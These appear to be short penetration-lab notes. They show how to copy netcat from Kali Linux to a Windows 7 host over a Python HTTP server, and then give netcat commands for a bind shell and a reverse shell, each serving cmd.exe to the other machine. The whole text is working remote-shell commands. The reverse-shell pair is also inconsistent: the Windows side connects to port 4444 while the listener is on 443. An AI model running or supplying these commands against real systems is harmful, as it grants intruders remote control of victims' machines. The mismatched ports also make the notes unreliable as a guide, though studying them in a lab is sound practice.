Transfer netcat to win7:
1.Move to "cd /usr/share/windows-binaries"
2.Run the command: "python -m SimpleHTTPServer 80"
3.Download netcat from windows 7 by browsing to the kali linux ip address from your browser


Bind Shell
BOB (Win7):
nc.exe -nlvp 4444 -e cmd.exe

Alice (Kali Linux):
nc -nv 192.168.1.65 4444


Reverse Shell:
BOB (Win7):
nc.exe -nv 192.168.1.66 4444 -e cmd.exe 

Alice (Kali Linux):
nc -lvp 443

 
